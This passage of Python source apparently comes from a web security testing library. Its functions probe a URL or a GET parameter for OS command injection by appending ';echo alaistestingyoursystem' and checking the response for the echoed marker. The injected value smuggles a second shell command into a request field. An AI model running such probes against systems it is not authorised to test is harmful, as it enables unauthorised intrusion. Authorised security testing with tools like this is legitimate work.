hea={'User-Agent': us} u+='; echo alaistestingyoursystem' try: r=requests.get(u,headers = hea,proxies=proxy,timeout=timeout, verify=False) if (r.status_code==200): if ("alaistestingyoursystem" in r.text): s=True except: pass if logs==True: if s==True: print("[+]Vulnerable!!!") else: print("[-]Not vulnerable") if returning==True: return s def command_exec_get(u,param='',value='',extra=None,timeout=10,proxy=None,user_agent=None,cookie=None): ''' this function is for command execution test using a given link and GET parameter ''' value+=";echo alaistestingyoursystem" if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} pl={param:value} if extra: pl.update(extra) try: r=requests.get(u,params=pl,headers = hea,proxies=proxy,timeout=timeout, verify=False) if